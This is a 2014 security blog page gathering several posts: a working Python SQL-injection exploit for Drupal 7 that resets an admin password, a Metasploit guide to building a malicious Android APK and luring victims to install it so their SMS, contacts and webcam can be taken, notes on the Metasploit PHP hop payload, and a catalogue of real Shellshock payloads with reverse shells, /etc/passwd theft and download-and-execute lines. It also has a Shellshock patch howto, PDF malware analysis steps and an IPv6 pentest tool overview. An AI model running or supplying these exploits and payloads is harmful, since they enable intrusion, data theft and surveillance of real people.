CVE Feeds

Oct 16, 2014

Ruxcon & Breakpoint - Material


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Drupal 7.x SQL Injection SA-CORE-2014-005

    #Drupal 7.x SQL Injection SA-CORE-2014-005
    #Creditz to
    import urllib2,sys
    from drupalpass import DrupalHash #
    host = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    if len(sys.argv) != 3:
        print "host username password"
        print " admin wowsecure"
    hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
    target = '%s/?q=node&destination=node' % host
    post_data = "name[0%20;update+users+set+name%3d\'" \
                +user \
                +"'+,+pass+%3d+'" \
                +hash[:55] \
    content = urllib2.urlopen(url=target, data=post_data).read()
    if "mb_strlen() expects parameter 1" in content:
            print "Success!\nLogin now with user:%s and pass:%s" % (user, password)

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Hack In The Box 2014 - Material

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 15, 2014

Howto: Fix ShellShock in CentOS 4

First, follow the "Setup" procedure from
Then run the following commands from your %_topdir:
rpm -ivh bash-3.0-27.el4.src.rpm
cd ..
Patch SPECS/bash.spec with this diff:
< Release: 27%{?dist}
> Release: 27.2%{?dist}
> Patch17: bash30-017
< #%patch16 -p0 -b .016
> %patch16 -p0 -b .016
> %patch17 -p0 -b .017
Then finish with these commands:
rpmbuild -ba SPECS/bash.spec
sudo rpm -Uvh RPMS/i386/bash-3.0-27.2.i386.rpm
If someone knows an easy way to upload them, I'll put up my source and RPM.
Edit: The latest comments in the Red Hat Bugzilla say the patch is incomplete. The new ID is CVE-2014-7169.
Edit: There are two additional patches from, so also download those into the same SOURCES directory:
Then also edit the SPECS/bash.spec as follows ("Release" numbering optional):
< Release: 27%{?dist}
> Release: 27.2.019%{?dist}
> Patch17: bash30-017
> Patch18: bash30-018
> Patch19: bash30-019
< #%patch16 -p0 -b .016
> %patch16 -p0 -b .016
> %patch17 -p0 -b .017
> %patch18 -p0 -b .018
> %patch19 -p0 -b .019 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: PDF Analysis in 5 steps

  1. Find and Extract Javascript One technique is using Didier Stevens suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is Pdfid which can show several keywords used in PDF files that could be used to exploit vulnerabilities.
  2. Deobfuscate Javascript The second step is to deobfuscate the JavaScript. JavaScript can contain several layers of obfuscation. in this case there was quite some manual cleanup in the extracted code just to get the code isolated. The object.raw contained 4 JavaScript elements between <script xxxx contentType=”application/x-javascript”> tags and 1 image in base64 format in <image> tag.  This JavaScript code between tags needs to be extracted and place into a separated file. The same can be done for the chunk of base64 data, when decoded will produce a 67Mb BMP file.
  3. Extract the shellcode The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript
  4. Create a shellcode executable Next with the shellcode encoded in hexadecimal format we can produce a Windows binary that runs the shellcode. This is achieved using a script called written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states ” The script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine its.
  5. Analyze shellcode and determine what is does. Final step is to determine what the shellcode does. To analyze the shellcode you could use a dissasembler or a debugger. In this case the a static analysis of the shellcode using the strings command shows several API calls used by the shellcode. Further also shows a URL pointing to an executable that will be downloaded if this shellcode gets executed

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Videos: Brucon 2014


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 14, 2014

Howto: use PHP Hop payload of Metasploit

1. The payload is in the $(metasploit folder)/data/php/hop.php

2. Copy hop.php to any website that you want

3. In exploit module, use windows/meterpreter/reverse_hop_http for payload options and set HOPURL to website that you set up in step#2(In this example:

4. Exploit the client, if exploit success, client will visit and send the session to hop.php. After that you will get the meterpreter session :)

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 13, 2014

Howto: Hacking Android with Metasploit

1. Create payload
# msfpayload android/meterpreter/reverse_tcp LHOST=hacker_ip LPORT=80 R > /var/www/evil.apk
2. Create Metasploit Listener
# msfconsole
msf> use multi/hundler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST hacker_ip
msf> set LPORT 80
msf> exploit

3. Social Engineering for lure victim to visit malicious website

4. After user install evil.apk and get the meterpreter
>> for get sms
> dump_sms
>> For web cams
> webcam_list
> webcam_snap
>> for get contacts 
> dump_contacts 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 5, 2014

Some payload of real attack with ShellShock

Automated Click Fraud

Note: This has a blank line, whereas the ones below do not. Also, URLs have been defanged [.] to prevent self-infection.
Accept: () { :;}; /bin/ -c "curl

User-Agent: () { :;}; /bin/ -c "wget -q -O /dev/null

These requests are attempting to convince the target machine to get resources from suspicious networks, at first glance they almost appear as if a user had clicked on an ad. It is worth mentioning that the above domain was only recently registered on September 19, 2014. The potential for automated click fraud here is evident as it would be trivial for attackers to craft HTTP requests that generate ad revenue, making it another avenue for the Blackhat SEO crowd to exploit for financial gain.

The No-Malware Reverse Shell Technique

GET /cgi-bin/ HTTP/1.1
User-Agent: () { :;}; /bin/ -c '/bin/ -i >& /dev/tcp/ 0>&1'

Many people are unaware that BASH actually has built-in commands for sending and receiving network traffic. They work similarly to netcat, but without requiring any other malware or supporting tools to be present on the system. The example above shows how to create an extremely useful reverse shell, just using BASH itself.
Through a clever bit of advanced BASH syntax, it calls a second BASH shell, which it then binds to a network socket connected to the attacker’s IP on port 3333. Because this second shell is called with the ‘-i’ option (for “interactive” mode), it provides full two-way communication to the attacker, operating much as a normal command line shell would. The attacker has merely to listen on the correct port in order to receive a full interactive shell on the victim system.

Stealing the Password File

GET /cgi-bin/status/status.cgi HTTP/1.1
User-Agent: () { :;}; echo "Bagstash: " $(</etc/passwd)

The command above is injected into the HTTP User-Agent, though this time the objective is a simple smash-and-grab of the system password file.
After echoing the string “Bagstash: ” back to the attacker, the exploit uses BASH’s command substitution. The “$(…)” construct starts a subshell and executes the included command, also returning the resulting output to the attacker. In this case, the command is “</etc/passwd”, which is a standard BASH shortcut equivalent to “cat /etc/passwd”. In other words, the password file has just gone out the front door.

Email-Based Reconnaissance

GET /cgi-bin/w3mman2html.cgi HTTP/1.1
Host: <domain>
Cookie: () { ignored;};/bin/ -c 'mail -s hello <address>'
Referer: () { ignored;};/bin/ -c 'mail -s hello <address>'
User-Agent: () { ignored;};/bin/ -c 'mail -s hello <address>'

A very large percentage of the total number of exploit attempts are really just probes designed to somehow let the attacker know if it has succeeded, without causing any real damage to the system. Most of these use the “ping” command, or even the /dev/tcp capability mentioned above. This one, however, stood out due to the fact that it was the only one to use email.
The command above is fairly straightforward. If successful, the exploit uses the built-in Unix “mail” command to send a message to the indicated Gmail address, with the subject line “hello”. There is no message body.
Because email often takes very indirect routes to its destination, with the potential to involve many intermediate mail servers before final delivery, it seems odd that an attacker would consider this a reliable way to identify which systems were successfully exploited. Nevertheless, we observed this at multiple customers, using the same email address.

Payload Analyses

We have observed a number of injected BASH commands that attempt to download malware to vulnerable hosts via exploitation of the Shellshock BASH bug. The following is a brief analysis of these cases. They follow a similar format as the previous section.

Reverse Shell Perl Script

GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
User-Agent: () { :;}; /bin/ -c "/usr/bin/wget http://singlesaints[.]com/firefile/temp?h=<domain> -O /tmp/"
Host: <domain>
Accept: */*

The injected BASH command above simply downloads a file. The downloaded payload (md5: 27cb601055cee7a4e55a91ee524f3d88) is a Perl script that sets up a reverse shell connecting to on port 23 to singlesaints[.]com, a dating site for Mormons and the same domain that is hosted the downloaded script, resolves to this IP.
The script was first submitted to VirusTotal yesterday and at this time, it only has one detection. It was named after “Bashattack”, inferring that it was previously unknown to AV vendors. Curiously, the script, along with its server component, is hosted at

Tsunami/Kaiten, an IRC-based DDoS Client/Backdoor

GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: shellshock-scan (
Accept: */*
Cookie: () { :; }; wget -O /tmp/besh; chmod 777 /tmp/besh; /tmp/besh;
Host: () { :; }; wget -O /tmp/besh; chmod 777 /tmp/besh; /tmp/besh;
Referer: () { :; }; wget -O /tmp/besh; chmod 777 /tmp/besh; /tmp/besh;

The injected BASH commands above download a file, change its permissions to read/write/execute for all users, and executes the file. The downloaded payload (md5: aec2df8a6cb35aa5b01b0d9f1f879aa1) is an x86_64 ELF executable that was submitted to VirusTotal and detected by many vendors as Tsunami/Kaiten. It mainly functions as a DDoS client, but also has backdoor capabilities, communicating over IRC. This particular variant is configured to connect to and receive commands from the same IP address it was downloaded from:

UDP Flood

GET / HTTP/1.0
User-Agent: masscan/1.0 (
Accept: */*
Cookie: () { :; }; wget > /var/www/conf.php; wget
‪txt > /var/www/html/conf.php
Host: () { :; }; wget > /var/www/conf.php; wget > /var/www/html/conf.php
Referer: () { :; }; wget > /var/
‪www/conf.php; wget > /var/www/html/conf.php

The injected commands above download a PHP file to what are commonly configured to be a Web server’s root directories, trying two different common locations. The PHP script (md5: 19149a03c9bd3a2706cb355df52862dd) was submitted to VirusTotal earlier yesterday with a few detections identifying it as a flooder. It is a small and simple PHP script that will continuously send UDP packets with 65,000 bytes of random alphanumerical characters to a host. The host, port, and time limit are all passed as GET request parameters along with a simple authentication password that must be “microstresser14”. The idea here is to convert exploited Web servers into on-demand DDoS clients.

Perl.Shellbot, another IRC-based DDoS Client/Backdoor

GET / HTTP/1.0
Accept: */*
Accept-Language: en-US
User-Agent: () { :;}; /bin/ -c ' -i >& /dev/tcp/ 0>&1'
Host: <domain>
Connection: Close

The injected command above use the technique described above in the section titled “The No-Malware Reverse Shell Technique”. It sets up an interactive BASH shell to read in commands from a service running on on port 3333. This server was hosting a file named index.html that contained the following BASH commands that were likely used in this attack:
rm -rf /tmp/.lCE-unix;echo 
unix;perl -MMIME::Base64 -ne 'print decode_base64()' < /tmp/.lCE-
unix|python;wget -O /tmp/.lCE-unix;perl /tmp/.lCE-unix 
443;rm -rf /tmp/.lCE-unix;uptime

The commands above Base64 decode the initial string into the following python code below and execute it with Python.
import urllib;urllib.urlretrieve ("", "/tmp/.lCE-unix")

The code above simply downloads a file. The proceeding BASH commands redundantly (perhaps as a fallback mechanism) download the same file again using wget, then execute the file with Perl, removing the file after execution. The Perl script (md5: cd23ef54e264bd84ab1a12dddceb3f48) was first submitted to VirusTotal over a year ago and is known as ShellBot. It is an IRC bot with remote shell, scanning, and DDoS functionality. The BASH command passes it arguments that direct it to connect to on port 443.

Another Perl.Shellbot Variant

GET /cgi-bin/hello HTTP/1.0
User-Agent: () { :;}; /bin/ -c "cd /tmp; wget http://dl.directxex[.]net/dl/nice.png; chmod +x *; perl nice.png"
Host: <domain>

The injected BASH commands above download a file to /tmp, make all files in /tmp executable (including the downloaded file), and execute the downloaded file with Perl. The downloaded file (md5: b0b8a35445a4743ff6f196a4c0bba688) is a Perl script referring to itself as “DDoS Perl IrcBot v1.0” in its comments. It was first submitted to VirusTotal only ten days ago, on September 17th with several detections naming it ShellBot, the same as with our previous analysis above. This script shares much code and functionality with the previous sample as well. This script is configured to connect to on port 6667.

Tiny Reverse Shell ELF Executable

GET /cgi-
m%3Dcucurbita_pepo HTTP/1.1
Host: <domain>
content-length: 0
accept-encoding: gzip, deflate
referrer: ()
{ :; }; /bin/ -c "rm /tmp/.osock; if $(/bin/uname -m | /bin/grep 64) 
; then /usr/bin/wget -O /tmp/.osock; 
/usr/bin/lwp-download http://82.118.242[.]223:9199/v64 /tmp/.osock; 
/curl -o /tmp/.osock; else /usr/bin/wget -O /tmp/.osock; /usr/bin/lwp-download 
http://82.118.242[.]223:9199/v /tmp/.osock; /usr/bin/curl
99/v -o /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock"
accept: */*
user-agent: User-Agent: Mozilla/5.0 (X11; Linux x86_64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 
cookie: () { :; }; /bin/ -c "rm /tmp/.osock; if $(/bin/uname -m | 
/bin/grep 64) ; then /usr/bin/wget -O 
/tmp/.osock; /usr/bin/lwp-download http://82.118.242[.]223:919

The injected BASH commands above, in this case, are quite lengthy. This is because it tries three different methods for downloading the payload. It also checks to see if the system is 64-bit or not and downloads a 64-bit version of the payload appropriately. The payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from:


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Chiron - An All-In-One IPv6 Penetration Testing Framework

Last week I had the pleasure to give you my impressions regarding my experience about hacking for b33r at Ghent, that is, my participation at BruCON 2014 hacking conference. As I said among else, the reason that I was there was to present Chiron, my IPv6 penetration testing/security assessment framework, which was supported by the Brucon 5×5 program. The first version of Chiron had been presented at Troopers 14, during the IPv6 Security Summit.

But what exactly is Chiron and what are the differences, if any, from other well-known IPv6 penetration testing frameworks? I will try to give you an idea quite briefly. For motivation purposes, just allow me to say before starting to describe it, that it is this tool we used to find evasion vulnerabilities at popular IDPS appliances, like Tipping Point and Suricata, to run the RISC project, to prepare our BlackHat US 2014 and the upcoming BlackHat EU 2014 presentations, etc.
But, let’s start. Chiron is a multi-threaded tool written in Python and based on Scapy. It can run on Linux systems and it is comprised of the following modules:
  • IPv6 Scanner
  • IPv6 Link Local Messages Creation Tool
  • IPv4-to-IPv6 Proxy
All the above modules are supported by a common library that allows the creation of completely arbitrary IPv6 header chains, fragmented or not.
Chiron must be run with root privileges, it provides just a CLI (sorry GUI fans…), but it is accompanied by a detailed – with examples – documentation. A good knowledge of the corresponding IPv6 RFCs is a plus if you want to use its advanced features.
One significant difference in comparison with other IPv6 pen-testing tools is that it does not implement out-of-the-box some well-known attacks, such as the SLAAC attack, Router DoS or redirections attacks, etc., but it allows you to do so by constructing and sending – very easily – the required packets to achieve these attacks on your own. But the main focus of Chiron is on the construction of arbitrary header chains. This capability can be used:
  • To test the IPv6 protocol design.
  • To test the IPv6 protocol implementation.
  • To evade IDS/IPS devices, firewalls, or other security or networking devices.
  • To fuzz IPv6-capable devices regarding the handling of IPv6 extension headers and their parameters.
But, let’s start.
The Chiron Scanner module incorporates most of the usual scanning techniques known from other tools like nmap plus some IPv6-specific (e.g. IPv6 multicast ping, etc.). You can use as destinations:
  • list of IPv6 addresses.
  • IPv6 subnets (just be careful, if you want to finish before the end of the life of the universe…).
  • IPv6 ranges like 2001:db8::1-ffff
  • “Smart” scan combinations (by combining suffixes like ‘face’, ‘b00c’, ‘beef’, etc).
Please “Read The Fine Manual” (RTFM) for more info and more capabilities (source spoofing, defining MAC addresses, etc.).
The Chiron Link-Local module supports the following messages:
  • Router Advertisement Messages
  • Router Solicitation Messages
  • Neighbor Advertisement Messages
  • Neighbor Solicitation Messages
  • Router Redirect
  • Packet Too Big
  • MLD/MLDv2 Messages (Queries, Reports, Done)
You can define on them every single parameter. Doing so, you can launch several attacks, like the ones mentioned above. Again, the accompanied documentation is your friend.
The other module is the IPv4-to-IPv6 Proxy. The purpose of this tool is the following. Many of our favourite penetration testing tools do not support, at least not yet, IPv6 and hence, we cannot use them against IPv6 “targets”. However, even if they do so, they are used exactly in the same way as it was used to be in IPv4. That is, they do not “exploit” all the features and the capabilities of the IPv6 protocols, such as the IPv6 Extension Headers.
This module of the framework operates like a proxy between the IPv4 and the IPv6 protocol. It is not a common proxy like web proxy, because it operates at layer 3. It accepts packets at a specific IPv4 address, extracts the layer-4 header and its payload, and sends them to a “target” using IPv6 but adding optionally one or more IPv6 extension headers.


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.




 Please subscribe my blog.

 Old Subscribe

Share |